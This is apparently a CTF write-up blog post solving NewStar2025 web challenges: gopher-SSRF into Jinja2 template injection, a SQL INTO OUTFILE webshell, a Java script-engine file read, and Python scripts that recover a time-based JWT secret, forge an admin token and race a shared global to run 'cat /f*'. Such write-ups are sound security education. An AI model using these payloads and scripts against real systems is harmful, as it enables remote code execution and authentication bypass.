class="headerlink" title="9.NewStar2025-week4 SSTI 在哪里?"></a>9.NewStar2025-week4 Where is the SSTI?</h1><p>There is SSRF.</p><p>Reading file:///etc/passwd shows it is a Flask service</p><p>file:///app/app.py reads the source</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask import Flask, request, render_template_string</span><br><span class="line">import os</span><br><span class="line"></span><br><span class="line">app = <span class="title function_ invoke__">Flask</span>(__name__)</span><br><span class="line"></span><br><span class="line">@app.<span class="title function_ invoke__">route</span>(<span class="string">'/'</span>, methods=[<span class="string">'GET'</span>,<span class="string">'POST'</span>])</span><br><span class="line">def <span class="title function_ invoke__">index</span>():</span><br><span class="line"> template = request.form.<span class="title function_ invoke__">get</span>(<span class="string">'template'</span>, <span class="string">'Hello World!'</span>)</span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">render_template_string</span>(template)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> app.<span class="title function_ invoke__">run</span>(host=<span class="string">'127.0.0.1'</span>, port=<span class="number">5001</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Whatever name receives is handed to template, which smells like SSTI</p><p>Attack it over the gopher protocol; first, a quick introduction to the gopher protocol</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">gopher protocol</span><br><span class="line"> Concept:</span><br><span class="line"> 1. The gopher protocol is an information lookup system that organizes files on the internet into an index, making it easy to take a user from one place on the internet to another. After the WWW appeared, gopher lost its former glory.</span><br><span class="line"> 2. It is now obsolete. It only supports text, not images.</span><br><span class="line"> 3. The gopher protocol can do many things; it plays an especially important role in SSRF, where it can be used against internal FTP, Telnet, Redis and Memcache services, and it can also issue GET and POST requests</span><br><span class="line"> 4. The gopher protocol can disguise a GET request as a POST request; it is the most powerful protocol in SSRF exploitation (commonly called the "universal protocol") and can be used for a reverse shell</span><br><span class="line"> Syntax: gopher://127.0.0.1:80/_{TCP/IP data stream}</span><br><span class="line"> Notes:</span><br><span class="line"> 1. The _ here cannot be omitted</span><br><span class="line"> 2. The default port is 70, but it depends on the case: 80 for http, 443 for https</span><br><span class="line"> 3. For a POST request, the carriage return and line feed must be written as %0D%0A to tell the computer the line is finished. With multiple parameters, the & between them must also be URL-encoded</span><br><span class="line"> Requirements: when building the request, only these few necessary items need to be kept</span><br><span class="line"> gopher : //127.0.0.1:80/_POST /flag.php HTTP/1.1</span><br><span class="line"> Host : challenge-0cd16c73a7cf875a.sandbox.ctfhub.com:10800</span><br><span class="line"> Content-Type : application/x-www-form-urlencoded</span><br><span class="line"> Content-Length : 36</span><br></pre></td></tr></table></figure><p>The flag is in the environment variables</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span 
class="line">url=gopher://127.0.0.1:5000/_GET%2520%252F%2520HTTP%252F1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250AContent-Length%253A%252056%250A%250Aname%253D%257B%257Blipsum.__globals__%255B'os'%255D%255B'popen'%255D('env').read()%257D%257D</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130223209913.png" alt="image-20251130223209913"></p><p>Success.</p><h1 id="10-NewStar2025-week4-sqlupload"><a href="#10-NewStar2025-week4-sqlupload" class="headerlink" title="10.NewStar2025-week4 sqlupload"></a>10.NewStar2025-week4 sqlupload</h1><p>A fairly new technique: inject your malicious code at a specific position, then find a way to save it somewhere it can be executed</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?order=upload_time INTO OUTFILE '/var/www/html/1.php'</span><br></pre></td></tr></table></figure><p>The problem is in getFileList.php</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130225217389.png" alt="image-20251130225217389"></p><p>We can control the order parameter to write filename out to a file</p><p>By intercepting the request, upload something whose file name is a one-line webshell</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130225233805.png" alt="image-20251130225233805"></p><p>Save it as 1.php</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?order=upload_time INTO OUTFILE '/var/www/html/1.php'</span><br></pre></td></tr></table></figure><p>Visit 1.php and pass commands via POST</p><p>But /readFlag cannot be read directly</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130225409391.png" alt="image-20251130225409391"></p><p>Redirect it to 2.txt, then read 2.txt directly</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span 
class="line">1=system('/readFlag>2.txt');</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130225801015.png" alt="image-20251130225801015"></p><p>Got the flag.</p><h1 id="11-NewStar2025-week5-眼熟的计算器"><a href="#11-NewStar2025-week5-眼熟的计算器" class="headerlink" title="11.NewStar2025-week5 眼熟的计算器"></a>11.NewStar2025-week5 A Familiar-Looking Calculator</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Source code recreated from a .class file by IntelliJ IDEA</span></span><br><span class="line"><span class="comment">// (powered by 
FernFlower decompiler)</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line">package org.example.newstar.controller;</span><br><span class="line"></span><br><span class="line">import javax.script.ScriptEngineManager;</span><br><span class="line">import org.springframework.stereotype.Controller;</span><br><span class="line">import org.springframework.ui.Model;</span><br><span class="line">import org.springframework.web.bind.annotation.GetMapping;</span><br><span class="line">import org.springframework.web.bind.annotation.RequestParam;</span><br><span class="line"></span><br><span class="line">@Controller</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">NewstarController</span> </span>{</span><br><span class="line"> <span class="keyword">private</span> String[] BLACKLIST = <span class="keyword">new</span> <span class="title class_">String</span>[]{<span class="string">"import"</span>, <span class="string">"java.lang.Runtime"</span>, <span class="string">"new"</span>};</span><br><span class="line"></span><br><span class="line"> <span class="keyword">private</span> String <span class="title function_ invoke__">calculate</span>(String content) throws <span class="built_in">Exception</span> {</span><br><span class="line"> <span class="keyword">for</span>(String word : this.BLACKLIST) {</span><br><span class="line"> <span class="keyword">if</span> (content.<span class="title function_ invoke__">contains</span>(word)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"Blacklisted word detected: "</span> + word;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> Object result = (<span class="keyword">new</span> <span class="title class_">ScriptEngineManager</span>()).<span class="title function_ 
invoke__">getEngineByName</span>(<span class="string">"js"</span>).<span class="keyword">eval</span>(content);</span><br><span class="line"> <span class="keyword">return</span> result.<span class="title function_ invoke__">toString</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> @<span class="title function_ invoke__">GetMapping</span>({<span class="string">"/"</span>})</span><br><span class="line"> <span class="keyword">public</span> String <span class="title function_ invoke__">home</span>(Model model) throws <span class="built_in">Exception</span> {</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"index"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> @<span class="title function_ invoke__">GetMapping</span>({<span class="string">"/calc"</span>})</span><br><span class="line"> <span class="keyword">public</span> String <span class="title function_ invoke__">status</span>(@<span class="title function_ invoke__">RequestParam</span>(<span class="string">"content"</span>) String content, Model model) throws <span class="built_in">Exception</span> {</span><br><span class="line"> model.<span class="title function_ invoke__">addAttribute</span>(<span class="string">"result"</span>, this.<span class="title function_ invoke__">calculate</span>(content));</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"index"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Threw it straight at an AI and guessed /flag</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span 
class="line">Java.type('java.nio.file.Files').readAllLines(Java.type('java.nio.file.Paths').get("/flag"),Java.type('java.nio.charset.StandardCharsets').UTF_8).toString()</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251130230036669.png" alt="image-20251130230036669"></p><h1 id="12-NewStar2025-week5-废弃的网站"><a href="#12-NewStar2025-week5-废弃的网站" class="headerlink" title="12.NewStar2025-week5 废弃的网站"></a>12.NewStar2025-week5 The Abandoned Website</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span 
class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask import Flask, request, render_template, abort, redirect, render_template_string</span><br><span class="line">import jwt, hashlib, time</span><br><span class="line"></span><br><span class="line">app = <span class="title function_ invoke__">Flask</span>(__name__)</span><br><span class="line">time_started = <span class="title function_ invoke__">round</span>(time.<span class="title function_ invoke__">time</span>())</span><br><span class="line"><span class="keyword">print</span>(f<span class="string">"System started at {time_started}"</span>)</span><br><span class="line">APP_SECRET = hashlib.<span class="title function_ invoke__">sha256</span>(<span class="title function_ 
invoke__">str</span>(time_started).<span class="title function_ invoke__">encode</span>()).<span class="title function_ invoke__">hexdigest</span>()</span><br><span class="line"></span><br><span class="line">tempuser = None</span><br><span class="line"></span><br><span class="line">USER_DB = {</span><br><span class="line"> <span class="string">"admin"</span>: {<span class="string">"id"</span>: <span class="number">1</span>, <span class="string">"role"</span>: <span class="string">"admin"</span>, <span class="string">"name"</span>: <span class="string">"Administrator"</span>},</span><br><span class="line"> <span class="string">"guest"</span>: {<span class="string">"id"</span>: <span class="number">2</span>, <span class="string">"role"</span>: <span class="string">"guest"</span>, <span class="string">"name"</span>: <span class="string">"Guest User"</span>},</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">def <span class="title function_ invoke__">admin_required</span>(f):</span><br><span class="line"> def <span class="title function_ invoke__">wrapper</span>(*args, **kwargs):</span><br><span class="line"> cookie = request.cookies.<span class="title function_ invoke__">get</span>(<span class="string">'session'</span>, None)</span><br><span class="line"> <span class="keyword">if</span> cookie is None:</span><br><span class="line"> </span><br><span class="line"> response = <span class="title function_ invoke__">redirect</span>(<span class="string">'/'</span>)</span><br><span class="line"> session = jwt.<span class="title function_ invoke__">encode</span>(USER_DB[<span class="string">'guest'</span>], APP_SECRET, algorithm=<span class="string">'HS256'</span>)</span><br><span class="line"> response.<span class="title function_ invoke__">set_cookie</span>(<span class="string">'session'</span>, session)</span><br><span class="line"> <span class="keyword">return</span> response</span><br><span class="line"> <span 
class="keyword">try</span>:</span><br><span class="line"> user_data = jwt.<span class="title function_ invoke__">decode</span>(cookie, APP_SECRET, algorithms=[<span class="string">'HS256'</span>])</span><br><span class="line"> <span class="keyword">if</span> user_data[<span class="string">'role'</span>] != <span class="string">'admin'</span>:</span><br><span class="line"> <span class="title function_ invoke__">abort</span>(<span class="number">403</span>, description=<span class="string">"Admin access required."</span>)</span><br><span class="line"> <span class="keyword">if</span> user_data[<span class="string">'name'</span>] != <span class="string">'Administrator'</span>:</span><br><span class="line"> <span class="title function_ invoke__">abort</span>(<span class="number">403</span>, description=<span class="string">"Admin access required."</span>)</span><br><span class="line"> time.<span class="title function_ invoke__">sleep</span>(<span class="number">0.15</span>)</span><br><span class="line"> except jwt.InvalidTokenError:</span><br><span class="line"> <span class="title function_ invoke__">abort</span>(<span class="number">401</span>, description = f<span class="string">"Session expired. Please log in again. 
System has been running {round(time.time() - time_started)} seconds."</span>)</span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">f</span>(*args, **kwargs)</span><br><span class="line"> wrapper.__name__ = f.__name__</span><br><span class="line"> <span class="keyword">return</span> wrapper</span><br><span class="line"></span><br><span class="line">@app.before_request<span class="comment">#Flask request hook; it runs automatically before every HTTP request is handled</span></span><br><span class="line">def <span class="title function_ invoke__">load_user</span>():</span><br><span class="line"> <span class="keyword">if</span> request.endpoint == <span class="string">'static'</span>:</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> <span class="keyword">global</span> tempuser<span class="comment">#global variable</span></span><br><span class="line"> cookie = request.cookies.<span class="title function_ invoke__">get</span>(<span class="string">'session'</span>, None)</span><br><span class="line"> <span class="keyword">if</span> cookie is None:</span><br><span class="line"> tempuser = USER_DB[<span class="string">'guest'</span>]</span><br><span class="line"> session = jwt.<span class="title function_ invoke__">encode</span>(tempuser, APP_SECRET, algorithm=<span class="string">'HS256'</span>)</span><br><span class="line"> response = <span class="title function_ invoke__">redirect</span>(request.path)</span><br><span class="line"> response.<span class="title function_ invoke__">set_cookie</span>(<span class="string">'session'</span>, session)</span><br><span class="line"> <span class="keyword">return</span> response</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> user_data = jwt.<span class="title function_ invoke__">decode</span>(cookie, APP_SECRET, algorithms=[<span class="string">'HS256'</span>])</span><br><span class="line"> tempuser = user_data</span><br><span class="line"> except 
jwt.InvalidTokenError:</span><br><span class="line"> session = jwt.<span class="title function_ invoke__">encode</span>(USER_DB[<span class="string">'guest'</span>], APP_SECRET, algorithm=<span class="string">'HS256'</span>)</span><br><span class="line"> content = <span class="title function_ invoke__">render_template_string</span>(</span><br><span class="line"> <span class="string">"Session expired. Please log in again. System has been running %d seconds."</span> %</span><br><span class="line"> (<span class="title function_ invoke__">round</span>(time.<span class="title function_ invoke__">time</span>() - time_started))</span><br><span class="line"> )</span><br><span class="line"> response = app.<span class="title function_ invoke__">make_response</span>((content, <span class="number">401</span>))</span><br><span class="line"> response.<span class="title function_ invoke__">set_cookie</span>(<span class="string">'session'</span>, session)</span><br><span class="line"> <span class="keyword">return</span> response</span><br><span class="line"> </span><br><span class="line">@app.<span class="title function_ invoke__">route</span>(<span class="string">'/'</span>, methods=[<span class="string">'GET'</span>])</span><br><span class="line">def <span class="title function_ invoke__">home</span>():</span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">render_template</span>(<span class="string">'index.html'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.<span class="title function_ invoke__">route</span>(<span class="string">"/admin"</span>, methods=[<span class="string">'GET'</span>])</span><br><span class="line">@admin_required</span><br><span class="line">def <span class="title function_ invoke__">admin_panel</span>():</span><br><span class="line"> <span class="keyword">global</span> tempuser</span><br><span class="line"> <span class="keyword">return</span> <span 
class="title function_ invoke__">render_template_string</span>(<span class="string">"Welcome Back, %s"</span> % tempuser[<span class="string">'name'</span>])</span><br><span class="line"></span><br><span class="line">@app.<span class="title function_ invoke__">route</span>(<span class="string">"/static/<path:filename>"</span>, methods=[<span class="string">'GET'</span>])</span><br><span class="line">def <span class="title function_ invoke__">serve_static</span>(filename):</span><br><span class="line"> <span class="keyword">if</span> not filename.<span class="title function_ invoke__">endswith</span>(<span class="string">'.png'</span>):</span><br><span class="line"> <span class="title function_ invoke__">abort</span>(<span class="number">403</span>, description=<span class="string">"Only .png files are allowed."</span>)</span><br><span class="line"> <span class="keyword">return</span> app.<span class="title function_ invoke__">send_static_file</span>(filename)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> app.<span class="title function_ invoke__">run</span>(host=<span class="string">"0.0.0.0"</span>, port=<span class="number">5000</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The render_template_string call in admin_panel is an SSTI sink: tempuser['name'] is spliced into the template source with %, so a name containing {{...}} is evaluated by Jinja2. Reaching it needs an admin session, though. APP_SECRET is derived from the server's start time (the script below assumes the SHA-256 hex digest of the integer start timestamp), and whenever the session cookie fails to decode, load_user's 401 page echoes how many seconds the server has been running. The start time is therefore now minus uptime, give or take a second for rounding and network delay, so the script tries offsets of -1, 0 and +1 and derives a candidate secret from each. Two caveats: the arithmetic uses your own clock, so it only works if your clock and the server's agree to within a second (the HTTP Date response header gives the server's view of the time, to the second), and each candidate can be confirmed offline against the guest cookie the server itself issues on first visit, because only the right secret decodes it without InvalidTokenError. Note also that tempuser is a module-level global shared by every request, so once an admin token exists, a second request carrying the payload in name can overwrite it between admin_required's check and the render in admin_panel, which is what the threaded script at the end races for. First, the script that recovers the secret:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import hashlib</span><br><span class="line">import re</span><br><span class="line"></span><br><span class="line">def <span class="title function_ invoke__">get_app_secret</span>():</span><br><span class="line"> target_url = <span class="string">"http://8.147.132.32:24710/admin"</span></span><br><span class="line"> cookies = {</span><br><span class="line"> <span class="string">'td_cookie'</span>: <span class="string">'2928931217'</span>,</span><br><span class="line"> <span class="string">'session'</span>: <span class="string">'1'</span></span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> response = requests.<span class="title function_ invoke__">get</span>(target_url, cookies=cookies, timeout=<span class="number">5</span>)</span><br><span class="line"> <span class="keyword">match</span> = re.<span class="title function_ invoke__">search</span>(r<span class="string">'System has been running (\d+) seconds'</span>, response.text)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">match</span>:</span><br><span class="line"> uptime = <span 
class="keyword">int</span>(<span class="keyword">match</span>.<span class="title function_ invoke__">group</span>(<span class="number">1</span>))</span><br><span class="line"> current_time = <span class="keyword">int</span>(time.<span class="title function_ invoke__">time</span>())</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># allow for rounding and clock skew: derive a candidate from each plausible start time</span></span><br><span class="line"> <span class="keyword">for</span> offset in <span class="title function_ invoke__">range</span>(-<span class="number">1</span>, <span class="number">2</span>): </span><br><span class="line"> time_started = current_time - uptime + offset</span><br><span class="line"> app_secret = hashlib.<span class="title function_ invoke__">sha256</span>(<span class="title function_ invoke__">str</span>(time_started).<span class="title function_ invoke__">encode</span>()).<span class="title function_ invoke__">hexdigest</span>()</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">print</span>(f<span class="string">"start time ({offset}): {time_started}"</span>)</span><br><span class="line"> <span class="keyword">print</span>(f<span class="string">"secret ({offset}): {app_secret}"</span>)</span><br><span class="line"> <span class="keyword">print</span>(<span class="string">"-"</span> * <span class="number">50</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">print</span>(<span class="string">"could not extract the uptime from the response"</span>)</span><br><span class="line"> except <span class="built_in">Exception</span> <span class="keyword">as</span> e:</span><br><span class="line"> <span class="keyword">print</span>(f<span class="string">"request failed: {e}"</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> <span class="title function_ invoke__">get_app_secret</span>()</span><br><span 
class="line"></span><br></pre></td></tr></table></figure><p>Forge the admin token with the recovered secret:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">import jwt</span><br><span class="line">import datetime</span><br><span class="line"></span><br><span class="line"><span class="comment"># JWT header</span></span><br><span class="line">headers = {</span><br><span class="line"> <span class="string">"alg"</span>: <span class="string">"HS256"</span>,</span><br><span class="line"> <span class="string">"typ"</span>: <span class="string">"JWT"</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment"># payload: the admin identity (id 1, role admin, name Administrator)</span></span><br><span class="line">token_dict = {</span><br><span class="line"> <span class="string">"id"</span>: <span class="number">1</span>,</span><br><span class="line"> <span class="string">"role"</span>: <span class="string">"admin"</span>,</span><br><span class="line"> <span class="string">"name"</span>: <span class="string">"Administrator"</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment"># recovered APP_SECRET (one of the candidates from the previous step)</span></span><br><span class="line">secret = <span 
class="string">'c484d1e6ed651fc48231d0629ec282172fe9f41c0d74fd8c2ea34bc325ca8b83'</span></span><br><span class="line"></span><br><span class="line">jwt_token = jwt.<span class="title function_ invoke__">encode</span>(token_dict, secret, algorithm=<span class="string">'HS256'</span>, headers=headers)</span><br><span class="line"><span class="keyword">print</span>(<span class="string">"JWT Token:"</span>, jwt_token)</span><br><span class="line"></span><br></pre></td></tr></table></figure><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import threading</span><br><span class="line">import jwt</span><br><span class="line"></span><br><span class="line">target_url = <span class="string">"http://8.147.132.32:24710"</span></span><br><span class="line">secret = <span 
class="string">'c484d1e6ed651fc48231d0629ec282172fe9f41c0d74fd8c2ea34bc325ca8b83'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># two tokens under the recovered secret: a clean admin one, and a guest one whose name carries the SSTI payload</span></span><br><span class="line">admin_token = jwt.<span class="title function_ invoke__">encode</span>({<span class="string">"id"</span>: <span class="number">1</span>, <span class="string">"role"</span>: <span class="string">"admin"</span>, <span class="string">"name"</span>: <span class="string">"Administrator"</span>}, secret, algorithm=<span class="string">'HS256'</span>)</span><br><span class="line">ssti_token = jwt.<span class="title function_ invoke__">encode</span>({<span class="string">"id"</span>: <span class="number">2</span>, <span class="string">"role"</span>: <span class="string">"guest"</span>, <span class="string">"name"</span>: <span class="string">"{{lipsum.__globals__.os.popen('cat /f*').read()}}"</span>}, secret, algorithm=<span class="string">'HS256'</span>)</span><br><span class="line"></span><br><span class="line">def <span class="title function_ invoke__">send_admin_request</span>():</span><br><span class="line"> <span class="string">""</span><span class="string">"Hit /admin with the forged admin token; if the race is won, the response body contains the command output"</span><span class="string">""</span></span><br><span class="line"> cookies = {<span class="string">'td_cookie'</span>: <span class="string">'2928931217'</span>, <span class="string">'session'</span>: admin_token}</span><br><span class="line"> response = requests.<span class="title function_ invoke__">get</span>(f<span class="string">"{target_url}/admin"</span>, cookies=cookies)</span><br><span class="line"> <span class="keyword">print</span>(f<span class="string">"[*] /admin response: {response.text}"</span>)</span><br><span class="line"></span><br><span class="line">def <span class="title function_ invoke__">send_ssti_request</span>():</span><br><span class="line"> <span class="string">""</span><span class="string">"Hit / with the guest token so that load_user overwrites the shared global tempuser with the payload"</span><span class="string">""</span></span><br><span class="line"> cookies = {<span class="string">'td_cookie'</span>: <span class="string">'2928931217'</span>, <span class="string">'session'</span>: ssti_token}</span><br><span class="line"> response = requests.<span class="title function_ invoke__">get</span>(target_url, cookies=cookies) <span class="comment"># any route that passes through before_request will do; / is the cheapest</span></span><br><span class="line"> <span class="comment"># nothing to print here: only the /admin response matters</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># fire both requests at once and repeat; the overwrite has to land between admin_required's check and the render</span></span><br><span class="line"><span class="keyword">for</span> i in <span class="title function_ invoke__">range</span>(<span class="number">100</span>): <span class="comment"># 100 attempts</span></span><br><span class="line"> t1 = threading.<span class="title function_ invoke__">Thread</span>(target=send_admin_request)</span><br><span class="line"> t2 = threading.<span class="title function_ invoke__">Thread</span>(target=send_ssti_request)</span><br><span class="line"> t1.<span class="title function_ invoke__">start</span>()</span><br><span class="line"> t2.<span class="title function_ invoke__">start</span>()</span><br><span class="line"> t1.<span class="title function_ invoke__">join</span>()</span><br><span class="line"> t2.<span class="title function_ invoke__">join</span>()</span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="下周目标-1"><a href="#下周目标-1" class="headerlink" title="下周目标"></a>Next week's goals</h1><p>Get the remaining challenge done, and give ISCTF my best shot.</p><p>Direct link to the post:</p><p><a 
href="https://shaneior.github.io/2025/11/26/%E4%BD%A0%E7%BC%BA%E5%A4%B1%E7%9A%84%E9%82%A3%E9%97%A8%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%AF%BE/">https://shaneior.github.io/2025/11/26/%E4%BD%A0%E7%BC%BA%E5%A4%B1%E7%9A%84%E9%82%A3%E9%97%A8%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%AF%BE/</a></p>]]></content>
</entry>
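Worked example of the secret-recovery and forgery steps in the write-up above, added by the editor; it is not code from the original post or from the challenge. It uses only the Python standard library (HMAC-SHA256 over the JWT signing input, which is exactly what PyJWT's HS256 does), simulates the server side inline with a constructed start time, and assumes, as the exploit script does, that APP_SECRET is the SHA-256 hex digest of the integer start timestamp and that the leaked uptime is round(now - time_started). What it adds over the script above is the check a practitioner wants: each candidate secret is confirmed against a token the server itself signed (the guest cookie), so the offset window can be widened to cover clock skew without any guessing.

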